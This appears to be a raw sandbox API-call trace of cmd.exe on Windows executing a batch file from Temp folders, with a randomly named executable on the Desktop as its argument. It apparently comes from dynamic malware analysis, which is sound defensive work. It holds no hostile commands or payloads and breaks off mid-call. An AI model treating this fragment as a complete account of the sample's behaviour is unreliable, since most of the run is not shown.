[0099.295] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0099.295] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.295] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.295] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.295] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.295] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.295] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.295] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.295] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.295] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.296] malloc (_Size=0xffce) returned 0x1dc257d0040 [0099.296] ??_V@YAXPEAX@Z () returned 0x1dc257d0040 [0099.297] GetProcessHeap () returned 0x1dc256b0000 [0099.297] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x40) returned 0x1dc256b9920 [0099.297] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257d0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0099.297] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x1dc257d0040, lpFilePart=0x407419f6d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419f6d0*="Desktop") returned 0x17 [0099.298] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.298] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x407419f400 | out: lpFindFileData=0x407419f400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x1dc256b9970 [0099.299] FindClose (in: hFindFile=0x1dc256b9970 | out: hFindFile=0x1dc256b9970) returned 1 [0099.299] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x407419f400 | out: lpFindFileData=0x407419f400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x1dc256b9970 [0099.299] FindClose (in: hFindFile=0x1dc256b9970 | out: hFindFile=0x1dc256b9970) returned 1 [0099.300] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x407419f400 | out: lpFindFileData=0x407419f400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x1dc256b9970 [0099.300] FindClose (in: hFindFile=0x1dc256b9970 | out: hFindFile=0x1dc256b9970) returned 1 [0099.300] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.300] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0099.300] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0099.301] GetProcessHeap () returned 0x1dc256b0000 [0099.301] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b8ab0) returned 1 [0099.301] GetEnvironmentStringsW () returned 0x1dc256b0fc0* [0099.301] GetProcessHeap () returned 0x1dc256b0000 [0099.301] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe9c) returned 0x1dc256b9970 [0099.302] FreeEnvironmentStringsA (penv="=") returned 1 [0099.302] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0099.302] GetProcessHeap () returned 0x1dc256b0000 [0099.302] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256b9920) returned 1 [0099.302] ??_V@YAXPEAX@Z () returned 0x1 [0099.302] ??_V@YAXPEAX@Z () returned 0x1 [0099.302] GetProcessHeap () returned 0x1dc256b0000 [0099.302] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4016) returned 0x1dc256ba820 [0099.303] GetProcessHeap () returned 0x1dc256b0000 [0099.303] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xee) returned 0x1dc256b6df0 [0099.303] GetProcessHeap () returned 0x1dc256b0000 [0099.303] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256be840 [0099.304] GetProcessHeap () returned 0x1dc256b0000 [0099.304] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256c2860 [0099.308] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0099.308] malloc (_Size=0xffce) returned 0x1dc257c0060 [0099.308] ??_V@YAXPEAX@Z () returned 0x1dc257c0060 [0099.308] GetProcessHeap () returned 0x1dc256b0000 [0099.308] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256c6880 [0099.311] SetErrorMode (uMode=0x0) returned 0x0 [0099.311] SetErrorMode (uMode=0x1) returned 0x0 [0099.311] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\.", nBufferLength=0xffce, lpBuffer=0x1dc256c6890, lpFilePart=0x407419f810 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x407419f810*="Desktop") returned 0x55 [0099.311] SetErrorMode (uMode=0x0) returned 0x1 [0099.311] GetProcessHeap () returned 0x1dc256b0000 [0099.312] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c6880, Size=0xe6) returned 0x1dc256c6880 [0099.312] GetProcessHeap () returned 0x1dc256b0000 [0099.312] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c6880) returned 0xe6 [0099.312] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\.") returned 1 [0099.312] GetProcessHeap () returned 0x1dc256b0000 [0099.312] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xc2) returned 0x1dc256b6ef0 [0099.312] GetProcessHeap () returned 0x1dc256b0000 [0099.312] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x170) returned 0x1dc256b77d0 [0099.313] GetProcessHeap () returned 0x1dc256b0000 [0099.313] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b77d0, Size=0xc2) returned 0x1dc256b77d0 [0099.313] GetProcessHeap () returned 0x1dc256b0000 [0099.313] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b77d0) returned 0xc2 [0099.313] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.313] GetProcessHeap () returned 0x1dc256b0000 [0099.313] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256b0730 [0099.322] GetProcessHeap () returned 0x1dc256b0000 [0099.322] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b0730, Size=0x7e) returned 0x1dc256b0730 [0099.322] GetProcessHeap () returned 0x1dc256b0000 [0099.322] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b0730) returned 0x7e [0099.322] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.322] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", fInfoLevelId=0x1, lpFindFileData=0x407419f580, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419f580) returned 0xffffffffffffffff [0099.322] GetLastError () returned 0x7b [0099.323] ??_V@YAXPEAX@Z () returned 0x1 [0099.324] GetProcessHeap () returned 0x1dc256b0000 [0099.324] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be840) returned 1 [0099.325] GetProcessHeap () returned 0x1dc256b0000 [0099.325] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2860) returned 1 [0099.325] GetProcessHeap () returned 0x1dc256b0000 [0099.325] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256ba820) returned 1 [0099.326] GetConsoleOutputCP () returned 0x1b5 [0099.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0099.429] GetUserDefaultLCID () returned 0x409 [0099.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff67b90bb78, cchData=8 | out: lpLCData=":") returned 2 [0099.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x407419fa90, cchData=128 | out: lpLCData="0") returned 2 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x407419fa90, cchData=128 | out: lpLCData="0") returned 2 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x407419fa90, cchData=128 | out: lpLCData="1") returned 2 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff67b90bb68, cchData=8 | out: lpLCData="/") returned 2 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff67b90bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff67b90bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff67b90ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff67b90ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff67b90ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff67b90b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff67b90b980, cchData=32 | out: lpLCData="Sun") returned 4 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff67b90bb58, cchData=8 | out: lpLCData=".") returned 2 [0099.430] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff67b90bb40, cchData=8 | out: lpLCData=",") returned 2 [0099.430] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0099.431] GetProcessHeap () returned 0x1dc256b0000 [0099.431] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x0, Size=0x20c) returned 0x1dc256b78b0 [0099.431] GetConsoleTitleW (in: lpConsoleTitle=0x1dc256b78b0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0099.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0099.747] GetProcAddress (hModule=0x7ffce9120000, lpProcName="CopyFileExW") returned 0x7ffce913e830 [0099.748] GetProcAddress (hModule=0x7ffce9120000, lpProcName="IsDebuggerPresent") returned 0x7ffce913e300 [0099.748] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffce6900a40 [0099.748] ??_V@YAXPEAX@Z () returned 0x1 [0099.748] GetProcessHeap () returned 0x1dc256b0000 [0099.748] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256ba820 [0099.748] GetProcessHeap () returned 0x1dc256b0000 [0099.748] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256ba820) returned 1 [0099.754] _wcsicmp (_String1="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat", _String2=")") returned 58 [0099.754] _wcsicmp (_String1="FOR", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 3 [0099.754] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 3 [0099.754] _wcsicmp (_String1="IF", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 6 [0099.754] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 6 [0099.754] _wcsicmp (_String1="REM", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 15 [0099.754] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat") returned 15 [0099.755] GetProcessHeap () returned 0x1dc256b0000 [0099.755] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256b7ad0 [0099.755] GetProcessHeap () returned 0x1dc256b0000 [0099.755] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x8c) returned 0x1dc256b0fc0 [0099.756] GetProcessHeap () returned 0x1dc256b0000 [0099.756] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x6c) returned 0x1dc256b1060 [0099.757] GetConsoleTitleW (in: lpConsoleTitle=0x407419f980, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0099.926] malloc (_Size=0xffce) returned 0x1dc257c0060 [0099.926] ??_V@YAXPEAX@Z () returned 0x1dc257c0060 [0099.927] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.927] malloc (_Size=0xffce) returned 0x1dc257d0040 [0099.927] ??_V@YAXPEAX@Z () returned 0x1dc257d0040 [0099.928] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.928] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1dc257d0040, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0x407419f4d0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x407419f4d0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0099.931] ??_V@YAXPEAX@Z () returned 0x1 [0099.931] GetProcessHeap () returned 0x1dc256b0000 [0099.931] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256c8630 [0099.931] GetProcessHeap () returned 0x1dc256b0000 [0099.931] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256b10e0 [0099.931] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0099.931] malloc (_Size=0xffce) returned 0x1dc257d0040 [0099.931] ??_V@YAXPEAX@Z () returned 0x1dc257d0040 [0099.931] GetProcessHeap () returned 0x1dc256b0000 [0099.931] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1ffac) returned 0x1dc256d8620 [0099.934] SetErrorMode (uMode=0x0) returned 0x0 [0099.934] SetErrorMode (uMode=0x1) returned 0x0 [0099.934] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\.", nBufferLength=0xffce, lpBuffer=0x1dc256d8630, lpFilePart=0x407419f200 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp", lpFilePart=0x407419f200*="9BBA.tmp") returned 0x34 [0099.934] SetErrorMode (uMode=0x0) returned 0x1 [0099.934] GetProcessHeap () returned 0x1dc256b0000 [0099.934] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256d8620, Size=0x8c) returned 0x1dc256d8620 [0099.934] GetProcessHeap () returned 0x1dc256b0000 [0099.934] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256d8620) returned 0x8c [0099.934] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\.") returned 1 [0099.934] GetProcessHeap () returned 0x1dc256b0000 [0099.935] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x80) returned 0x1dc256b11d0 [0099.935] GetProcessHeap () returned 0x1dc256b0000 [0099.935] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec) returned 0x1dc256b1260 [0099.935] GetProcessHeap () returned 0x1dc256b0000 [0099.935] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b1260, Size=0x80) returned 0x1dc256b1260 [0099.935] GetProcessHeap () returned 0x1dc256b0000 [0099.935] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b1260) returned 0x80 [0099.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.935] GetProcessHeap () returned 0x1dc256b0000 [0099.935] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xe8) returned 0x1dc256b12f0 [0099.938] GetProcessHeap () returned 0x1dc256b0000 [0099.938] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256b12f0, Size=0x7e) returned 0x1dc256b12f0 [0099.938] GetProcessHeap () returned 0x1dc256b0000 [0099.938] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256b12f0) returned 0x7e [0099.939] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.939] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat", fInfoLevelId=0x1, lpFindFileData=0x407419ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x407419ef70) returned 0x1dc256b7b90 [0099.939] GetProcessHeap () returned 0x1dc256b0000 [0099.939] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x0, Size=0x28) returned 0x1dc256b1380 [0099.939] FindClose (in: hFindFile=0x1dc256b7b90 | out: hFindFile=0x1dc256b7b90) returned 1 [0099.940] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0099.940] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0099.940] ??_V@YAXPEAX@Z () returned 0x1 [0099.940] GetConsoleTitleW (in: lpConsoleTitle=0x407419f4f0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0100.039] GetProcessHeap () returned 0x1dc256b0000 [0100.039] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1e8) returned 0x1dc256b13b0 [0100.039] malloc (_Size=0xffce) returned 0x1dc257d0040 [0100.039] ??_V@YAXPEAX@Z () returned 0x1dc257d0040 [0100.039] ApiSetQueryApiSetPresence () returned 0x0 [0100.039] ResolveDelayLoadedAPI () returned 0x7ffcdeee1090 [0100.048] SaferWorker () returned 0x0 [0100.242] SetErrorMode (uMode=0x0) returned 0x0 [0100.242] SetErrorMode (uMode=0x1) returned 0x0 [0100.243] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat", nBufferLength=0x7fe7, lpBuffer=0x1dc256c8640, lpFilePart=0x407419f0b0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat", lpFilePart=0x407419f0b0*="9BCB.bat") returned 0x3d [0100.243] SetErrorMode (uMode=0x0) returned 0x1 [0100.243] malloc (_Size=0x4000) returned 0x1dc255c5910 [0100.243] GetProcessHeap () returned 0x1dc256b0000 [0100.243] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x8c) returned 0x1dc256ba8c0 [0100.243] wcsspn (_String=" C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", _Control=" \x09") returned 0x1 [0100.243] GetProcessHeap () returned 0x1dc256b0000 [0100.244] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x6a) returned 0x1dc256ba960 [0100.244] GetProcessHeap () returned 0x1dc256b0000 [0100.244] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xc4) returned 0x1dc256bb660 [0100.244] GetProcessHeap () returned 0x1dc256b0000 [0100.244] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bb660, Size=0x6c) returned 0x1dc256bb9f0 [0100.244] GetProcessHeap () returned 0x1dc256b0000 [0100.244] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bb9f0) returned 0x6c [0100.244] ??_V@YAXPEAX@Z () returned 0x1 [0100.244] CmdBatNotificationStub () returned 0x0 [0100.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0100.245] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0100.245] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.245] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.245] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.245] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.246] ReadFile (in: hFile=0x98, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x1e9, lpOverlapped=0x0) returned 1 [0100.247] SetFilePointer (in: hFile=0x98, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0100.247] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=11, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="@shift /0\r\n") returned 11 [0100.247] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.247] GetFileType (hFile=0x98) returned 0x1 [0100.247] _get_osfhandle (_FileHandle=3) returned 0x98 [0100.247] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0100.247] GetProcessHeap () returned 0x1dc256b0000 [0100.247] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256bf990 [0100.248] GetProcessHeap () returned 0x1dc256b0000 [0100.248] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0100.248] GetProcessHeap () returned 0x1dc256b0000 [0100.248] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0100.248] _wcsicmp (_String1="shift", _String2=")") returned 74 [0100.248] _wcsicmp (_String1="FOR", _String2="shift") returned -13 [0100.248] _wcsicmp (_String1="FOR/?", _String2="shift") returned -13 [0100.248] _wcsicmp (_String1="IF", _String2="shift") returned -10 [0100.248] _wcsicmp (_String1="IF/?", _String2="shift") returned -10 [0100.248] _wcsicmp (_String1="REM", _String2="shift") returned -1 [0100.249] _wcsicmp (_String1="REM/?", _String2="shift") returned -1 [0100.249] GetProcessHeap () returned 0x1dc256b0000 [0100.249] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bbb30 [0100.249] GetProcessHeap () returned 0x1dc256b0000 [0100.249] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x1c) returned 0x1dc256b9920 [0100.249] GetProcessHeap () returned 0x1dc256b0000 [0100.249] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x18) returned 0x1dc256b9260 [0100.250] _tell (_FileHandle=3) returned 11 [0100.250] _close (_FileHandle=3) returned 0 [0100.251] malloc (_Size=0xffce) returned 0x1dc257e0160 [0100.251] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0100.252] _wcsicmp (_String1="shift", _String2="DIR") returned 15 [0100.252] _wcsicmp (_String1="shift", _String2="ERASE") returned 14 [0100.252] _wcsicmp (_String1="shift", _String2="DEL") returned 15 [0100.252] _wcsicmp (_String1="shift", _String2="TYPE") returned -1 [0100.252] _wcsicmp (_String1="shift", _String2="COPY") returned 16 [0100.252] _wcsicmp (_String1="shift", _String2="CD") returned 16 [0100.252] _wcsicmp (_String1="shift", _String2="CHDIR") returned 16 [0100.252] _wcsicmp (_String1="shift", _String2="RENAME") returned 1 [0100.252] _wcsicmp (_String1="shift", _String2="REN") returned 1 [0100.252] _wcsicmp (_String1="shift", _String2="ECHO") returned 14 [0100.252] _wcsicmp (_String1="shift", _String2="SET") returned 3 [0100.252] _wcsicmp (_String1="shift", _String2="PAUSE") returned 3 [0100.252] _wcsicmp (_String1="shift", _String2="DATE") returned 15 [0100.252] _wcsicmp (_String1="shift", _String2="TIME") returned -1 [0100.253] _wcsicmp (_String1="shift", _String2="PROMPT") returned 3 [0100.253] _wcsicmp (_String1="shift", _String2="MD") returned 6 [0100.253] _wcsicmp (_String1="shift", _String2="MKDIR") returned 6 [0100.253] _wcsicmp (_String1="shift", _String2="RD") returned 1 [0100.253] _wcsicmp (_String1="shift", _String2="RMDIR") returned 1 [0100.253] _wcsicmp (_String1="shift", _String2="PATH") returned 3 [0100.253] _wcsicmp (_String1="shift", _String2="GOTO") returned 12 [0100.253] _wcsicmp 